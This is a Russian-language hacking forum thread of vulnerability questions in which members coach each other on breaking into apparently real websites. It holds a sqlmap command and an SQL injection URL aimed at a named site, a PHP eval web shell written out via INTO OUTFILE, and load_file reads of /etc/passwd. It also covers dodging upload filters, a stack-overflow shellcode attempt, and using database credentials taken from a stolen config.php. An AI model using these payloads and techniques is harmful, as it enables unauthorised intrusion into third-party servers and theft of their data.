Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Грабитель

    Joined:
    5 Mar 2013
    Messages:
    196
    Likes Received:
    12
    Reputations:
    -7
    BabaDook да действительно... уязвимость есть...
    Вопрос мой не об этом. Если сможете помочь найти рабочий вектр раскрутки, очень поможете.
     
  2. Dr.Strangelove

    Joined:
    1 Dec 2008
    Messages:
    111
    Likes Received:
    61
    Reputations:
    -6
    Да! Уже понял, что selinux или apparmor (особенно учитывая что ось убунта). Имеющиеся php-файлы редактировать не могу. Полный запрет на запись php файлов при наличии прав на запись. Перловые скрипты не выполняются. Питон еще конечно попробую, но крайне мало вероятно.
     
  3. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    хм то есть шелл какой никакой есть?
    сессии то апач куда то пишет, ну конечно это могут быть всякие редисы, но может и файлы, тогда в файл сессии можно записать что нужно, а потом проинклудить, может нужно найти диру доступную для записи( типа /tmp ), то есть на диры сайта может и стоят 777, но вполне возможен какой нибудь chattr +i и ппц
    php работает как модуль или cgi? неплохо было бы скидывать phpinfo в таких случаях хотя бы. обходить disable_functions пробовали?
     
    _________________________
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    результат запроса видимо кешируется, поэтому при повторной обращении с таким же запросом скули нет
    в sqlmap есть макрос для рандомизации параметра
    python sqlmap.py -u 'http://www.profclinic.ru/search/?search_string=1234567890qwertyuiopasdfghjklzxcvbnm' --randomize=search_string
    рандомить он будет из символов "1234567890qwertyuiopasdfghjklzxcvbnm", можно указать другие если нужно
    мда пробел и запятая фильтруется, вместо некоторых спецсимволов и вовсе подставляется знак %
    валидный запрос удалось составить, но данные как извлечь не придумал
    http://www.profclinic.ru/search/?se...2cczxceferg555dfwergtwevvvttr')||(select(1))#
     
    _________________________
    Грабитель and BabaDook like this.
  5. 1pman

    1pman New Member

    Joined:
    28 Sep 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    ребят, нужна помощ.
    Через sqlmap нашел блинд скулю, права на запись есть, всё как надо. Проблема в том, что поле логин выдает ошибку , где указан полный путь и при попытке залить шелл он берет его, а у тех папок из пути нету прав на запись..Так вот, как заставить его выбрать кастомный путь?
    Пробовал без sqlmapа UNION SELECT '<?php eval($_GET[‘e’]) ?>' INTO OUTFILE '' -- , но попытки оказались неудачными, тк в поле логин допустимо только 8 символов
     
    #1165 1pman, 10 Mar 2016
    Last edited: 11 Mar 2016
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    так проблема в нахождении диры доступной на запись или в ограничении в 8 символов?
    вообще если есть одна скуля, то скорее всего есть и другая :) это в плане ограничений
    на счет диры рекомендую пройтись хотя бы каким нибудь сканером, тем же nikto например https://cirt.net/Nikto2 и попробовать залить в найденные диры
     
    _________________________
    1pman likes this.
  7. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Я не особо понял в чем проблема. В любом случае в sqlmap можно указывать путь куда загружать шелл если задаешь параметр --os-shell (sqlmap сам предлагает ввести каталог). По поводу формы логина: там в html стоит ограничение на 8 символов или в скрипте? HTML можно в любом случае поправить если надо и убрать ограничения. Hope it helps.
     
    1pman likes this.
  8. 1pman

    1pman New Member

    Joined:
    28 Sep 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Диру открытую для записи я нашёл, даже несколько. ладно, фиг с ним, что скульмапа мне не предлагает самому указать путь куда заливать.
    Я пошёл другим путём, решил залить его через --sql-shell и тут возникла проблема:
    Вообще все привилегии у пользователя есть исходя из --priv, попытался прочесть хоть какой-нибудь файл, а он мне выдает пустые в ответ. Нашёл другой сайт, такая же беда. Оба на линьке работают, может они настроены таким образом? вообще уже не знаю в какую сторону копать
    Так же пробовал руками , при чтении файла пустая страница, все диры перебрал
     
  9. sinise

    sinise New Member

    Joined:
    12 Mar 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую камрады.

    На сайте есть форма для загрузки аватара, на вход принимает любой файл, но если загрузить php и попробовать его выполнить (даже пустой php файл), то выдает 500 External server error.
    Сайт на Yii 2.0.5, имя вебшелла (и любого файла) кодируется md5+время, поэтому создать файл .htaccess (чтобы дать выполнение php или в html php кода) нет возможности. Если загрузить вебшелл без расширения, то содержимое просто выводиться на экран.
    Пробовал загрузить jpg с прописанным в exif php кодом, не выполняется.

    Подскажите какие варианты можно попробовать еще.

    public function upload()
    {
    if ($this->validate()) {
    $avatarName = hash('md5', $this->avatar->baseName.''.time());
    $this->avatar->saveAs('uploads/avatar/' . $avatarName . '.' . $this->avatar->extension);
    $this->avatar = $avatarName.'.'.$this->avatar->extension;
    return true;
    } else {
    return false;
    }
    }
     
  10. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Файл не записывается даже руками? Если обратится к нему через веб то файл не существует? Когда файлы вручную читаете то хексовое имя используете load_file(0x2f6574632f706173737764)? С таким в общем-то никогда не сталкивался, поэтому не знаю что сказать. Нужно проверить чтобы дира действительна была доступна на запись. Бывает еще что из-за настроек безопасности типа apparmor mysqld запрещено писать в каталоги кроме разрешенных (типа /var/tmp) и директория вроде бы доступна на запись, но файл там базой создать нельзя. Поэтому такая инъекция годится либо того чтобы из базы добыть логин:хеш и в админку заиметь доступ, либо в паре с каким-нибудь LFI.
     
  11. 1pman

    1pman New Member

    Joined:
    28 Sep 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    возможно и правда из за настроек безопасности, ибо другие сайты с такой проблемой крутились на винде, либо домашнем пк, а тут они вообще пытались сами править код, но полностью не смогли убрать инъекцию и крутятся уже на норм хостингах. вычитал на забугорных форумах , упоминали как то тоже самое про безопасность. в общем вечером ещё смотреть буду...
    если что- то получится, отпишусь.
     
  12. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Для стандартной записи файла через скулю(SELECT код_шелла_в_HEX_или_в_кавычках FROM mysql.user INTO OUTFILE '/путь/файл') обязательно кавычки файла не должны фильтроваться(magic_quotes_* в PHP). Также возможно, что пути относительные, chroot или виндовые. Первым делом пробуйте прочитать файлы руками с кавычками и через hex, например load_file(0x2f6574632f706173737764) и load_file('/etc/passwd') - если первый прочитается, а второй нет, то наверняка фильтруются кавычки и стандартом не залить...
     
    #1172 Saint-Sky, 12 Mar 2016
    Last edited: 12 Mar 2016
  13. EP025

    EP025 New Member

    Joined:
    1 Jan 2016
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    Всем добрый день. Уже как день ломаю голову: изучаю обычное переполнение буффера со срывом стека и исполнением шеллкода. Шелл проверен на нескольких си-программах - рабочий, /bin/sh. Сделал все по правилам: nop-shellcode-esp. Так вот, при переполнении осуществляется перезапись eip адресом esp. Но при переходе на перезаписанный адрес, вылетает ошибка segmentation fault, eip указывает на тот самый буфер(не хочет выполняться даже первая nop-инструкция). Может быть нужно отключить какую-нибудь службу или я что-то неправильно делаю при подмене адреса?(про неработоспособность шелла не пишите, он работает на всех Си-програмах). Помогите пожалуйста. :) Ubuntu x86
     
  14. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
  15. ghost8

    ghost8 Member

    Joined:
    29 May 2015
    Messages:
    110
    Likes Received:
    20
    Reputations:
    0
    sqlmap тебе в помощь он крутит,только что проверил.
     
  16. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    да нет там ничего, с чего вы взяли что там уязвимость?
     
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    194
    Likes Received:
    5
    Reputations:
    0
    Вытащил с сайта config.php в нем есть данные подключения к БД.В поле хост "localhost" Что можно сделать?
     
  18. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    158
    Likes Received:
    37
    Reputations:
    2
    Поищи phpmyadmin
     
  19. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40